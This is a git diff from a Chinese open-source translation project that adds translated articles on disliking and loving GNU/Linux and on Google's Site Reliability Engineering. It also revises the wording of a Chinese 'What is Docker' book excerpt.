diff --git a/published/20151121 5 Things I Dislike and Love About GNULinux.md b/published/20151121 5 Things I Dislike and Love About GNULinux.md new file mode 100644 index 0000000000..5e0a097ca2 --- /dev/null +++ b/published/20151121 5 Things I Dislike and Love About GNULinux.md @@ -0,0 +1,94 @@ +GNU/Linux,爱憎由之 +================== + +首先,我能确定本文提及的内容一定会造成激烈的辩论,从之前那篇 [我讨厌 GNU/Linux 的五个理由 – 你呢,爱还是恨?][1] 的页底评论区就可见一斑。 + +也因此,我在此没有使用恨 (hate) 这个词,那会让我感觉很不舒服,所以我觉得用不喜欢 (dislike) 来代替更合适。 + +[![关于 Linux,我所不喜欢的事情](http://www.tecmint.com/wp-content/uploads/2015/11/Things-I-Dislike-About-Linux.png)][2] + +*关于 Linux,我所不喜欢的 5 件事。* + +也就是说,请读者记住,文中的观点完完全全出于我个人和自身的经历,而这些想法和经历可能会和他人的相似,也可能相去甚远。 + +此外,我也意识到,这些所谓的不喜欢(dislike)是与经验相关的,Linux 就是这个样子。然而,但正是这些事实阻碍了新用户做出迁移系统的决定。 + +像从前一样,随时留下评论并展开讨论,或者提出任何其他符合本文主题的观点。 + +### 不喜欢理由之一:从 Windows 迁移到 Linux 对用户来说是个陡峭的学习曲线 + +如果说使用 Windows 已经成为了你生活中不可缺少的一个部分,那么你在 Linux 电脑上安装一个新软件之前,还必须要习惯和理解诸如远程仓库(repository)、依赖关系(dependency)、包(package)和包管理器(package manager)等概念。 + +不久你也会发现,仅仅使用鼠标点击一个可执行程序是很难完成某个程序的安装的。或者由于一些原因,你没有可用的网络,那么安装一个你想要的软件会是一件非常累人的任务。 + +### 不喜欢理由之二:独立学习使用仍存在困难 + +类似理由一,事实上,最开始独立学习 Linux 知识的时候,很多人都会觉得那是一个巨大挑战。尽管网上有数以千万计的教程和 [大量的好书][3],但初学者也会因此烦了选择困难症,不知从何开始学习。 + +此外,数不清的社区 (比如:[linuxsay.com][4]) 论坛中都有大量的有经验用户为大家无偿提供(通常都是这样的)解答,但不幸的是,这些问题的解答并不完全可信、或者与新用户的经验和知识层面不匹配,导致用户无法理解。 + +事实上,因为有太多的发行版系列及其衍生版本可以获取,这使得我们有必要向第三方机构付费,让他们指引我们走向 Linux 世界的第一步、了解这些发行版系列之间的相同点以及区别。 + +### 不喜欢理由之三:新老系统/软件迁移问题 + +一旦你下定决心开始使用 Linux,那么无论是在家里或是办公室,也无论是个人版或者企业级,你都要完全从旧系统向新系统迁移,然后要考虑这些年来你所使用的软件在 Linux 平台上的替代产品。 + +而这确实令人矛盾不已,特别是要面对相同类型(比如文本处理器、关系型数据库系统、图形套件等) 的多个不同程序,而又没有受过专业指导和训练,那么很多人都下定不了决心要使用哪个好。 + +除非有可敬的有经验用户或者教学视频进行指导,否则存在太多的软件实例给用户进行选择,真的会让人走进误区。 + +### 不喜欢理由之四:缺乏硬件厂商的驱动支持 + +恐怕没有人能否认这样的事实,Linux 走过了漫长的历史,它的第一个内核版本公布已经有 20 多年了(LCTT 译注:准确说是将近 26 年了,1991.10.05 - 2017.02,相信现今很多我们这些 Linux 用户在第一个内核版本公布的时候都还没出生,包括译者在内)。随着越来越多的设备驱动编译进每次发布的稳定内核中、越来越多的厂商开始支持研究和开发兼容 Linux 的设备驱动,Linux 用户们不再会经常遇到设备运行不正常的情况了,但还是会偶尔遭遇的。 + +并且,如果你的个人计算或者公司业务需要一个特殊设备,但恰巧又没有现成的 Linux 驱动,你还得困在 Windows 或者其他有驱动支持的其他系统。 + +尽管你经常这样提醒自己:“闭源软件真他妈邪恶!”,但事实上的确有闭源软件,并且不幸的是,出于商业需求我们多数情况还是被迫使用它。 + +### 不喜欢理由之五:Linux 的主要力量仍在于服务器 + +这么说吧,我加入 Linux 阵营的主要原因是多年前它将一台老电脑生机焕发并能够正常使用让我看到了它的前景。花费了一段时间来解决不喜欢理由之一、之二中遇到的那些问题,并且成功使用一台 566 MHz 赛扬处理器、10 GB IDE 硬盘以及仅有 256 MB 内存的机器搭载 Debian Squeeze 建立起一个家庭文件/打印/ Web 服务于一体的服务器之后,我非常开心。 + +当我发现即便是处于高负载的情况,[htop 显示][5] 系统资源消耗才勉强到达一半,这令非常我惊喜。 + +你可能已经不停在再问自己,文中明明说的是不喜欢 Linux,为什么还提这些事呢?答案很简单,我是需要一个比较好的 Linux 桌面发行版来运行在一台相对老旧的电脑上。当然我并不指望能够有那么一个发行版可以运行上述提到那种硬件特征的电脑上,但我的确没有发现有任何一款外观漂亮的可定制桌面系统能运行在 1 GB 内存以下的电脑中,如果可以,其速度大概比鼻涕虫还慢吧。 + +我想在此重申一下:我是说“我没发现”,而非“不存在”。可能某天我会发现一个较好的 Linux 桌面发行版能够用在我房间里那台寿终正寝的笔记本上。如果那天真的到来,我将首先删除这篇文章,并向它竖起大拇指。 + +### 总而言之 + +在本文中,我也尝试了提及 Linux 在某些地方仍需不断改进。我是一名幸福的 Linux 用户,并由衷地感谢那些杰出的社区不断为 Linux 系统、组件和其他功能做出贡献。我想重复一下我在本文开头说的 —— 这些明显的不足点,如果从适当的角度去看也是一种优势,或者也快了吧。 + +在那到来之前,让我们相互支持,一起学习并帮助 Linux 成长和传播。随时在下方留下你的评论和问题 —— 我们期待你不同的观点。 + +------------------------------- + +作者简介: + +Gabriel Cánepa —— 一位来自阿根廷圣路易斯梅塞德斯镇 (Villa Mercedes, San Luis, Argentina) 的 GNU/Linux 系统管理员,Web 开发者。就职于一家世界领先级的消费品公司,乐于在每天的工作中能使用 FOSS 工具来提高生产力。 + +------------------------------- + +译者简介: + +[GHLandy](http://GHLandy.com) —— 生活中所有欢乐与苦闷都应藏在心中,有些事儿注定无人知晓,自己也无从说起。 + +------------------------------- + +via: http://www.tecmint.com/things-i-dislike-and-love-about-gnu-linux/ + +作者:[Gabriel Cánepa][a] +译者:[GHLandy](https://github.com/GHLandy) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/gacanepa/ +[1]:https://linux.cn/article-3855-1.html +[2]:http://www.tecmint.com/wp-content/uploads/2015/11/Things-I-Dislike-About-Linux.png +[3]:http://www.tecmint.com/10-useful-free-linux-ebooks-for-newbies-and-administrators/ +[4]:http://linuxsay.com/ +[5]:http://www.tecmint.com/install-htop-linux-process-monitoring-for-rhel-centos-fedora/ +[6]:http://www.tecmint.com/author/gacanepa/ +[7]:http://www.tecmint.com/10-useful-free-linux-ebooks-for-newbies-and-administrators/ +[8]:http://www.tecmint.com/free-linux-shell-scripting-books/ diff --git a/published/20160425 What is SRE.md b/published/20160425 What is SRE.md new file mode 100644 index 0000000000..5fcd049a85 --- /dev/null +++ b/published/20160425 What is SRE.md @@ -0,0 +1,91 @@ +什么是 SRE(网站可靠性工程)? +============================================================ + +网站可靠性工程师(Site Reliability Engineer)是近来越来越多看到的一个职位。它是什么意思?它来自哪里?让我们从 Google SRE 团队来学习。 + + ![Bridge](https://d3tdunqjn7n0wj.cloudfront.net/360x240/bridge-1031545-1400-389c9609ff7c64083c93db48dc77eeff.jpg) + +本文为 Niall Richard Murphy、Jennifer Petoff、Chris Jones、Betsy Beyer 编辑的 [《网站可靠性工程》Site Reliability Engineering][9] 一书的摘录。 + +SRE 网站可靠性工程(Site Reliability Engineering)在[ 11 月 7-10 日在阿姆斯特丹举办的 O'Reilly Velocity 会议][10]上也有提到。 + +### 介绍 + +> 希望不是一种策略。 +> +> —— 传统的 SRE 如是说 + +一个公认的事实是系统不会自己运行。 那么,一个系统 — 尤其是复杂大规模系统 — _应该_怎么运行呢? + +### 系统管理员的服务管理方法 + +以前,公司雇用系统管理员来运行复杂的计算系统。 + +系统管理员(或者称为 sysadmin)这种方式包括整合现有软件组件,使之互相协作来完成一个服务。系统管理员的任务是运行服务,响应事件,并在事件发生时进行更新。随着系统复杂度的增长和流量的增长,事件和更新也相应增长,导致管理员团队也越来越庞大才能完成更多的工作。由于系统管理员的角色需要的技能与产品开发人员有很大不同,开发和系统管理员被分为不同的团队:“开发”和“运维”。 + +系统管理员模式的服务管理有几个优点。对于决定该如何运行和服务的公司而言,这种方法相对容易实现:它作为一个已被人们所熟悉的行业范例,有很多例子可以从中学习和效仿。相关人才库已经广泛普及。有一系列现有的工具,软件组件(现成的或其他)和集成公司可用于帮助运行这些组装的系统,所以新手系统管理团队不必重新发明轮子以及从头设计系统。 + +此方式将公司开发和运维分离,也有一些缺点和困难。主要有两类:直接代价和间接代价。 + +直接代价很显而易见了。利用依靠手工干预来进行变更管理和事件处理的团队进行服务管理,当服务和/或流量增长时,成本是很昂贵的,因为团队随着系统负载的增长也在相应增长。 + +开发/运维分离的间接代价可能不那么明显,但常常比直接代价还要昂贵。代价来自于两个团队背景,技术,激励都非常不同。他们使用不同的词汇来描述所面临的情境;对技术方案的风险和可能性他们持不同的假设;对产品稳定性的目标级别也会有不同的争议。团队的分离很容易导致不只是激励的不同,还有沟通、目标的不同,以及最终,信任和尊重的分离。这是一种恶性循环。 + +因此,传统运营团队及其在产品开发中的同行往往会发生冲突,最突出的是如何将软件发布到生产环境。在开发团队的核心上,他们希望推出新功能,并看到它们被用户采纳。在运维团队的核心上, 他们希望确保服务在运行中不会中断。因为大多数中断是由某种变化引起的 - 新的配置、新的功能发布或者新的用户流量类型 - 这两个团队的目标基本上处于紧张状态。 + +两个团队都明白,以最想要的条款(“我们可以没有阻碍地在任何时间发布任何东西”以及“我们不想在系统工作后改变任何东西”)来表达他们的利益是不可接受的。因为他们的词汇和风险假设都不同,两个团体经常采用常见的斗争形式来提高他们的利益。 运维团队试图通过提高发布和变更门槛来保护运行中的系统免受更改的风险。例如,发布审查可能包含对_每个_问题的显式审查,这些问题过去都_曾经_引起过服务中断 - 它可能是一个任意长度的列表,并且不是所有检查元素都一样重要。开发团队很快学会了如何回应。他们通过较少的“发布”和更多的“功能切换”、“增量更新”或 “选择性失明”来规避。他们采取诸如分割产品功能的策略,以便更少的功能受到发布审查。 + +### Google 的服务管理方法:网站可靠性工程 + +冲突不是提供软件服务的必然部分。Google 选择以不同的方式运行自己的系统:我们的网站可靠性工程团队专注于雇佣软件工程师来运行我们的产品,并创建系统来完成那些本来由系统工程师手动完成的工作。 + +什么是网站可靠性工程(Site Reliability Engineering),是如它在谷歌定义的那样么?我的解释很简单:SRE 是当你要求一位软件工程师设计一个运维团队时所发生的结果。当我在 2003 年加入 Google 并负责运行一个由 7 名工程师组成的“生产团队”时,那时我工作的全部都是软件工程。所以我以自己是一名 SRE 的方式,设计和管理了一个_我_想要的团队的样子。这个团队已经成为了 Google 的目前的 SRE 团队,它仍如最初一名终生软件工程师所想象的那个样子。 + +Google 服务管理方法的主要构成部分是由每个 SRE 团队组成的。作为一个整体,SRE 可以分为两大类。 + +50-60% 的人是 Google 软件工程师,或者更确切地说,是通过 Google 软件工程师的标准程序招聘的人。其他 40-50% 的候选人非常接近 Google 软件工程师资格(即拥有所需技能集的 85-99%),以及一些具有大多数软件工程师没有的一些 SRE 技术技能的人。到目前为止,UNIX 系统底层和网络(第 1 层到第 3 层)的专业知识是我们寻求的两种最常见的替代技术技能。 + +所有的 SRE 的共同点是有开发软件系统以解决复杂问题的信念和能力。在 SRE 中,我们密切跟踪两个团队的职业发展,并且迄今为止发现在两种工程师之间的表现没有实际差异。事实上,SRE 团队的多样性背景经常产生聪明、高质量的系统,这显然是几个技能集合成的产物。 + +我们这样招聘 SRE 的结果是,我们有了这样一个团队:(a)手动执行任务很快会变得无聊。(b)他们有必要的技能集来写出软件以取代以前的手动操作,即使解决方案很复杂。SRE 还会与其他开发部门分享学术以及知识背景。因此,SRE 从根本上做了一个运维团队历来做的工作,但它使用具有软件专业知识的工程师,并期望这些内在倾向于使用软件并且有能力用软件的人用软件设计并实现自动化来代替人力劳动。 + +按照设计,至关重要的是 SRE 团队专注于工程。没有恒定的工程,运维工作增加,团队将需要更多的人来上工作量。最终,传统的以运维为中心的团队与服务规模呈线性关系:如果服务支持的产品成功,运维工作将随着流量而增长。这意味着雇用更多的人一遍又一遍地完成相同的任务。 + +为了避免这种命运,负责管理服务的团队需要写代码,否则就会被工作淹没。因此,Google 为 SRE 们_设置了一个 “运维” 工作的上限,如任务单、紧急呼叫、手动任务最多只占 50% 工作量_。此上限确保 SRE 团队在其计划中有足够的时间使服务稳定及可操作。50% 是上限;随着时间的推移,除了自己的设备,SRE 团队应该只有很少的运维工作,他们几乎可以完全从事开发任务,因为服务基本上可以运行和维修自己:我们想要的系统是_自动的_,而不只是_自动化_。在实践中,规模和新功能始终是 SRE 要考虑的。 + +Google 的经验法则是,SRE 团队必须花费剩余的 50% 的时间来进行实际开发。那么我们该如何执行这个阈值呢?首先,我们必须测量 SRE 如何花费时间。通过测量,我们确保团队不断花费不到 50% 的时间用于开发改变他们实践的工作上。通常这意味着会将一些运维负担转移回开发团队,或者给团队添加新的员工,而不指派该团队额外的运维责任。意识到在运维和开发工作之间保持这种平衡使我们能保证 SRE 具有参与创造性的自主工程的空间,同时仍然保留从运维那学来的智慧。 + +我们发现 Google SRE 的运行大规模系统的方法有很多优点。由于 SRE 是直接修改代码以使 Google 的系统可以运行自己,SRE 团队的特点是快速创新以及大量接受变革。这样的团队能相对价廉地支持相同的服务,面向运维的团队需要大量的人。相反,运行、维护和改进系统所需的 SRE 的数量随系统的大小而线性收敛。最后,SRE 不仅规避了开发/运维分裂的障碍,而且这种结构也改善了我们的产品开发团队:产品开发和 SRE 团队之间的轻松转移交叉训练了整个团队,并且提高了那些在学习构建百万级别分布式系统上有困难的开发人员的技能。 + +尽管有这些好处,SRE 模型的特点是其自身独特的挑战。 Google 面临的一个持续挑战是招聘 SRE:SRE 不仅与产品开发招聘流程竞争相同的候选人,而且我们将招聘人员的编码和系统工程技能都设置得如此之高,这意味着我们的招聘池必然很小。由于我们的学科相对新颖独特,在如何建立和管理 SRE 团队方面没有太多的行业信息(不过希望这本书能朝着这个方向迈进!)。一旦 SRE 团队到位,他们潜在的非正统的服务管理方法需要强有力的管理支持。例如,一旦错误预估耗尽,除非是管理层的强制要求, 否则在季度剩余的时间里决定停止发布可能不会被产品开发团队所接受。 + +> **DevOps 或者 SRE?** + +> “DevOps” 这个术语在 2008 年末出现,并在写这篇文章时(2016 年早期)仍在发生变动。 其核心原则:IT 部门在系统设计和开发的每个阶段的参与、严重依赖自动化与人力投入、工程实践和工具在操作任务中的应用,与许多 SRE 的原则和实践一致。 人们可以将 DevOps 视为几种核心 SRE原则向更广泛的组织,管理结构和人员的推广。 可以等价地将 SRE 视为具有某些特殊扩展的 DevOps 的特定实现。 + +------------------------ + +作者简介:Benjamin Treynor Sloss 创造了“网站可靠性工程(Site Reliability Engineering)”一词,他自 2003 年以来一直负责 Google 的全球运营、网络和生产工程。截至 2016 年,他管理着全球范围内一个大约 4000 名软硬件和网络工程师团队。 + +-------------------------------------------------------------------------------- + +via: https://www.oreilly.com/ideas/what-is-sre-site-reliability-engineering + +作者:[Benjamin Treynor][a] +译者:[geekpi](https://github.com/geekpi) +校对:[jasminepeng](https://github.com/jasminepeng) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.oreilly.com/people/benjamin-treynor-sloss +[1]:https://shop.oreilly.com/product/0636920053385.do +[2]:https://shop.oreilly.com/product/0636920053385.do +[3]:https://www.oreilly.com/ideas/what-is-sre-site-reliability-engineering +[4]:https://shop.oreilly.com/product/0636920053385.do +[5]:https://shop.oreilly.com/product/0636920053385.do +[6]:https://www.oreilly.com/people/benjamin-treynor-sloss +[7]:https://pixabay.com/ +[8]:https://www.oreilly.com/people/benjamin-treynor-sloss +[9]:http://shop.oreilly.com/product/0636920041528.do?intcmp=il-webops-books-videos-update-na_new_site_site_reliability_engineering_text_cta +[10]:http://conferences.oreilly.com/velocity/devops-web-performance-eu?intcmp=il-webops-confreg-update-vleu16_new_site_what_is_sre_text_cta +[11]:https://pixabay.com/ diff --git a/translated/tech/20160510 What is Docker.md b/published/20160510 What is Docker.md similarity index 64% rename from translated/tech/20160510 What is Docker.md rename to published/20160510 What is Docker.md index 7457e827f4..8ee6e48892 100644 --- a/translated/tech/20160510 What is Docker.md +++ b/published/20160510 What is Docker.md @@ -3,31 +3,31 @@ Docker 是什么? ![](https://d3tdunqjn7n0wj.cloudfront.net/720x480/card-catalog-crop-c76cf2c8b4881e6662c4e9058367a874.jpg) -这是一段摘录,取自于 Karl Matthias 和 Sean P. Kane 撰写的书籍 [Docker: Up and Running][3]。其中或许包含一些其他资源的引用,您可以点击其中的链接。 +> 这是一篇摘录,取自于 Karl Matthias 和 Sean P. Kane 撰写的 [Docker 即学即用][3]。其中或许包含一些引用到本文中没有的内容,因为那些是整本书中的一部分。 2013 年 3 月 15 日,在加利福尼亚州圣克拉拉召开的 Python 开发者大会上,dotCloud 的创始人兼首席执行官 Solomon Hvkes 在一场仅五分钟的[微型演讲][4]中,首次提出了 Docker 这一概念。当时,仅约 40 人(除 dotCloud 内部人员)获得了使用 Docker 的机会。 -这在之后的几周内,有关 Docker 的新闻铺天盖地。随后这个项目很快在 [Github][5] 上开源,任何人都可以下载它并为其做出贡献。在之后的几个月中,越来越多的业界人士开始听说 Docker 以及它是如何彻底地改变了软件开发,交付和运行的方式。一年之内,Docker 的名字几乎无人不知无人不晓,但还是有很多人不太明白 Docker 究竟是什么,人们为何如此兴奋。 +这在之后的几周内,有关 Docker 的新闻铺天盖地。随后这个项目很快在 [Github][5] 上开源,任何人都可以下载它并为其做出贡献。在之后的几个月中,越来越多的业界人士开始听说 Docker 以及它是如何彻底地改变了软件的开发、交付和运行的方式。一年之内,Docker 的名字几乎无人不知无人不晓,但还是有很多人不太明白 Docker 究竟是什么,人们为何如此兴奋。 -Docker 是一个工具,它致力于为任何应用程序创建易于分发的构建产物,将其部署到任何环境中,并简化敏捷软件组织的工作流程,降低响应速度。 +Docker 是一个工具,它致力于为任何应用程序创建分发版本而简化封装流程,将其部署到各种规模的环境中,并将敏捷软件组织的工作流程和响应流水化。 ### Docker 带来的希望 -虽然表面上被视为一个虚拟化平台,但 Docker 远远不止如此。Docker 涉及的领域横跨了业界多个方面,包括 KVM, Xen, OpenStack, Mesos, Capistrano, Fabric, Ansible, Chef, Puppet, SaltStack 等技术。或许你已经发现了,在 Docker 的竞争产品列表中有一个值得一提的事儿。例如,大多数工程师不会说,虚拟化产品会和配置管理工具是竞争关系,但 Docker 和这两种技术都有点关系。前面列举的一些技术常常因其提高了工作效率而获得称赞,这就导致了大量的探讨。而现在 Docker 正处在这些过去十年间最广泛使用的技术之中。 +虽然表面上被视为一个虚拟化平台,但 Docker 远远不止如此。Docker 涉及的领域横跨了业界多个方面,包括 KVM、 Xen、 OpenStack、 Mesos、 Capistrano、 Fabric、 Ansible、 Chef、 Puppet、 SaltStack 等技术。或许你已经发现了,在 Docker 的竞争产品列表中有一些很值得关注。例如,大多数工程师都不会认为,虚拟化产品和配置管理工具是竞争关系,但 Docker 和这两种技术都有点关系。前面列举的一些技术常常因其提高了工作效率而获得称赞,这就导致了大量的探讨。而现在 Docker 正是这些过去十年间最广泛使用的技术之一。 -如果你要拿 Docker 分别与这些领域的卫冕冠军按照功能逐项比较,那么 Docker 看上去可能只是个一般的竞争对手。Docker 在某些领域表现的更好,但它带来的是一个跨越广泛的解决工作流程中众多挑战的功能集合。通过结合应用程序部署工具(如 Capistrano, Fabric)的易用性和易于管理的虚拟化系统,提供使工作流程自动化和业务流程易于实施的钩子,Docker 提供了一个非常强大的功能集合。 +如果你要拿 Docker 分别与这些领域的卫冕冠军按照功能逐项比较,那么 Docker 看上去可能只是个一般的竞争对手。Docker 在某些领域表现的更好,但它带来的是一个跨越广泛的解决工作流程中众多挑战的功能集合。通过将应用程序部署工具(如 Capistrano、 Fabric)的易用性和虚拟化系统管理的易于性结合,使工作流程自动化,以及易于实施编排orchestration,Docker 提供了一个非常强大的功能集合。 -大量的新技术来来去去,因此对这些新事物保持一定的怀疑总是好的。如果不深入研究,人们很容易误以为 Docker 只是另一种为开发者和运营团队解决一些具体问题的技术。如果只是把 Docker 看作一种虚拟化技术或者部署技术,这似乎并不能令人信服。不过 Docker 可比表面上看起来的强大得多。 +大量的新技术来来去去,因此对这些新事物保持一定的怀疑总是好的。如果不深入研究,人们很容易误以为 Docker 只是另一种为开发者和运营团队解决一些具体问题的技术。如果把 Docker 单独看作一种虚拟化技术或者部署技术,它看起来并不引人注目。不过 Docker 可比表面上看起来的强大得多。 即使在小型团队中,团队内部的沟通和相处也往往是困难的。然而在我们生活的这个世界里,团队内部对于细节的沟通是迈向成功越来越不可或缺的因素。而一个能够降低沟通复杂性,协助开发更为强健软件的工具,无疑是一个巨大的成功。这正是 Docker 值得我们深入了解的原因。当然 Docker 也不是什么灵丹妙药,它的正确使用还需深思熟虑,不过 Docker 确实能够解决一些组织层面的现实问题,还能够帮助公司更好更快地发布软件。使用精心设计的 Docker 工作流程能够让技术团队更加和谐,为组织创造实实在在的收益。 -那么,最让公司感到头疼的问题是什么呢?现如今,很难按照预期的速度发布软件,而随着公司从只有一两个开发人员成长到拥有若干开发团队的时候,发布新版本时的沟通负担将越来越重,难以管理。开发者不能不去了解软件所处环境的复杂性,生产运营团队也需要不断地理解所发布软件的内部细节。通常这些都是不错的工作技能,因为它们有利于更好地从整体上理解发布环境,从而促进软件的鲁棒性设计。但是随着团队的壮大,需要掌握的技能也越来越多。 +那么,最让公司感到头疼的问题是什么呢?现如今,很难按照预期的速度发布软件,而随着公司从只有一两个开发人员成长到拥有若干开发团队的时候,发布新版本时的沟通负担将越来越重,难以管理。开发者不得不去了解软件所处环境的复杂性,生产运营团队也需要不断地理解所发布软件的内部细节。这些通常都是不错的工作技能,因为它们有利于更好地从整体上理解发布环境,从而促进软件的鲁棒性设计。但是随着组织成长的加速,这些技能的拓展很困难。 -充分了解所用的环境细节往往需要团队之间大量的沟通,而这并不能直接为团队创造值。例如,为了发布版本1.2.1, 开发人员要求运维团队升级特定的库,这个过程就降低了开发效率,也没有为公司创造价值。如果开发人员能够直接升级他们所使的库,然后编写代码,测试新版本,最后发布软件,那么整个交付过程所用的时间将会明显缩短。如果运维人员无需与多个应用开发团队相协调,就能够在宿主系统上升级软件,那么效率将大大提高。Docker 有助于在软件层面建立一层隔离,从而减轻团队的沟通负担。 +充分了解所用的环境细节往往需要团队之间大量的沟通,而这并不能直接为团队创造值。例如,为了发布版本 1.2.1、开发人员要求运维团队升级特定的库,这个过程就降低了开发效率,也没有为公司创造价值。如果开发人员能够直接升级他们所使的库,然后编写代码,测试新版本,最后发布软件,那么整个交付过程所用的时间将会明显缩短。如果运维人员无需与多个应用开发团队相协调,就能够在宿主系统上升级软件,那么效率将大大提高。Docker 有助于在软件层面建立一层隔离,从而减轻团队的沟通负担。 -除了有助于解决沟通问题,在某种程度上 Docker 的软件架构还鼓励开发出更多精致的应用程序。这种架构哲学的核心是一次性的小型容器。在新版本部署的时候,会将旧版本应用的整个运行环境全部丢弃。在应用所处的环境中,任何东西的存在时间都不会超过应用程序本身。这是一个简单却影响深远的想法。这就意味着,应用程序不会意外地依赖于之前版本的遗留产物; 对应用的短暂调试和修改也不会存在于未来的版本中; 应用程序具有高度的可移植性,因为应用的所有状态要么直接包含于用于部署的构建产物中,且不可修改,要么存储于数据库、缓存或文件服务器等外部依赖中。 +除了有助于解决沟通问题,在某种程度上 Docker 的软件架构还鼓励开发出更多健壮的应用程序。这种架构哲学的核心是一次性的小型容器。在新版本部署的时候,会将旧版本应用的整个运行环境全部丢弃。在应用所处的环境中,任何东西的存在时间都不会超过应用程序本身。这是一个简单却影响深远的想法。这就意味着,应用程序不会意外地依赖于之前版本的遗留产物;对应用的短暂调试和修改也不会存在于未来的版本中;应用程序具有高度的可移植性,因为应用的所有状态要么直接包含于部署物中,且不可修改,要么存储于数据库、缓存或文件服务器等外部依赖中。 -因此,应用程序不仅具有更好的可扩展性,而且更加可靠。存储应用的容器实例数量的增减,对于前端网站的影响很小。事实证明,这种架构对于非 Docker 化的应用程序已然成功,但是 Docker 自身包含了这种架构方式,使得 Docker 化的应用程序始终遵循这些最佳实践,这也是一件好事。 +因此,应用程序不仅具有更好的可扩展性,而且更加可靠。存储应用的容器实例数量的增减,对于前端网站的影响很小。事实证明,这种架构对于非 Docker 化的应用程序已然成功,但是 Docker 自身包含了这种架构方式,使得 Docker 化的应用程序始终遵循这些最佳实践,这也是一件好事。 ### Docker 工作流程的好处 @@ -35,60 +35,60 @@ Docker 是一个工具,它致力于为任何应用程序创建易于分发的 **使用开发人员已经掌握的技能打包软件** -> 许多公司为了管理各种工具来为它们的平台构建软件包,不得不提供一些软件发布和构建工程师的岗位。像 rpm, mock, dpkg 和 pbuilder 等工具使用起来并不容易,每一种工具都需要单独学习。而 Docker 则把你所有需要的东西全部打包起来,定义为一个文件。 +> 许多公司为了管理各种工具来为它们支持的平台生成软件包,不得不提供一些软件发布和构建工程师的岗位。像 rpm、mock、 dpkg 和 pbuilder 等工具使用起来并不容易,每一种工具都需要单独学习。而 Docker 则把你所有需要的东西全部打包起来,定义为一个文件。 **使用标准化的镜像格式打包应用软件及其所需的文件系统** -> 过去,不仅需要打包应用程序,还需要包含一些依赖库和守护进程等。然而,我们永远不能百分之百地保证,软件运行的环境是完全一致的。这就使得软件的打包很难掌握,许多公司也不能可靠地完成这项工作。使用 Scientific Linux 的用户经常会试图部署一个来自社区的,仅在 Red Hat Linux 上经过测试的软件包,希望这个软件包足够接近他们的需求。如果使用 Dokcer, 只需将应用程序和其所依赖的每个文件一起部署即可。Docker 的分层镜像使得这个过程更加高效,确保应用程序运行在预期的环境中。 +> 过去,不仅需要打包应用程序,还需要包含一些依赖库和守护进程等。然而,我们永远不能百分之百地保证,软件运行的环境是完全一致的。这就使得软件的打包很难掌握,许多公司也不能可靠地完成这项工作。常有类似的事发生,使用 Scientific Linux 的用户试图部署一个来自社区的、仅在 Red Hat Linux 上经过测试的软件包,希望这个软件包足够接近他们的需求。如果使用 Dokcer、只需将应用程序和其所依赖的每个文件一起部署即可。Docker 的分层镜像使得这个过程更加高效,确保应用程序运行在预期的环境中。 **测试打包好的构建产物并将其部署到运行任意系统的生产环境** -> 当开发者将更改提交到版本控制系统的时候,可以构建一个新的 Docker,然后通过测试,部署到生产环境,整个过程中无需任何的重新编译和重新打包。 +> 当开发者将更改提交到版本控制系统的时候,可以构建一个新的 Docker 镜像,然后通过测试,部署到生产环境,整个过程中无需任何的重新编译和重新打包。 **将应用软件从硬件中抽象出来,无需牺牲资源** > 传统的企业级虚拟化解决方案,例如 VMware,以消耗资源为代价在物理硬件和运行其上的应用软件之间建立抽象层。虚拟机管理程序和每一个虚拟机中运行的内核都要占用一定的硬件系统资源,而这部分资源将不能够被宿主系统的应用程序使用。而容器仅仅是一个能够与 Linux 内核直接通信的进程,因此它可以使用更多的资源,直到系统资源耗尽或者配额达到上限为止。 -Docker 出现之前,Linux 容器技术已经存在了很多年,Docker 使用的技术也不是全新的。但是这个独一无二的集强大架构和工作流程于一身的 Docker 要比各个技术加在一起还要强大的多。Docker 终于让已经存在了十余年的 Linux 容器走进了普通技术人员的生活中。Docker 让容器更加轻易地融入到公司现有的工作流程中。以上讨论到的问题是被很多人所关注的,以至于 Docker 项目的快速发展超出了所有人的合理预期。 +Docker 出现之前,Linux 容器技术已经存在了很多年,Docker 使用的技术也不是全新的。但是这个独一无二的集强大架构和工作流程于一身的 Docker 要比各个技术加在一起还要强大的多。Docker 终于让已经存在了十余年的 Linux 容器走进了普通技术人员的生活中。Docker 让容器更加轻易地融入到公司现有的工作流程中。以上讨论到的问题已被很多人认可,以至于 Docker 项目的快速发展超出了所有人的合理预期。 Docker 发布的第一年,许多刚接触的新人惊讶地发现,尽管 Docker 还不能在生产环境中使用,但是来自 Docker 开源社区源源不断的提交,飞速推动着这个项目向前发展。随着时间的推移,这一速度似乎越来越快。现在 Docker 进入了 1.x 发布周期,稳定性好了,可以在生产环境中使用。因此,许多公司使用 Docker 来解决它们在应用程序交付过程中面对的棘手问题。 ### Docker 不是什么 -Docker 可以解决很多问题,这些问题是其他类型的传统工具专门解决的。那么 Docker 在功能上的广度就意味着它在特定的功能上缺乏深度。例如,一些组织认为,使用 Docker 之后可以完全摈弃配置管理工具,但 Docker 真正强大之处在于,它虽然能够取代某些传统的工具,但通常与它们是兼容的,甚至与它们结合使用还能增强更加自身的功能。下面将列举一些 Docker 还未能完全取代的工具,如果与它们结合起来使用,往往能取得更好的效果。 +Docker 可以解决很多问题,这些问题是其他类型的传统工具专门解决的。那么 Docker 在功能上的广度就意味着它在特定的功能上缺乏深度。例如,一些组织认为,使用 Docker 之后可以完全摈弃配置管理工具,但 Docker 真正强大之处在于,它虽然能够取代某些传统的工具,但通常与它们是兼容的,甚至与它们结合使用还能增强自身的功能。下面将列举一些 Docker 还未能完全取代的工具,如果与它们结合起来使用,往往能取得更好的效果。 -**企业级虚拟化平台(VMware, KVM 等)** +**企业级虚拟化平台(VMware、KVM 等)** > 容器并不是传统意义上的虚拟机。虚拟机包含完整的操作系统,运行在宿主操作系统之上。虚拟化平台最大的优点是,一台宿主机上可以使用虚拟机运行多个完全不同的操作系统。而容器是和主机共用同一个内核,这就意味着容器使用更少的系统资源,但必须基于同一个底层操作系统(如 Linux)。 -**云平台(Openstack, CloudStack 等)** +**云平台(Openstack、CloudStack 等)** > 与企业级虚拟化平台一样,容器和云平台的工作流程表面上有大量的相似之处。从传统意义上看,二者都可以按需横向扩展。但是,Docker 并不是云平台,它只能在预先安装 Docker 的宿主机中部署,运行和管理容器,并能创建新的宿主系统(实例),对象存储,数据块存储以及其他与云平台相关的资源。 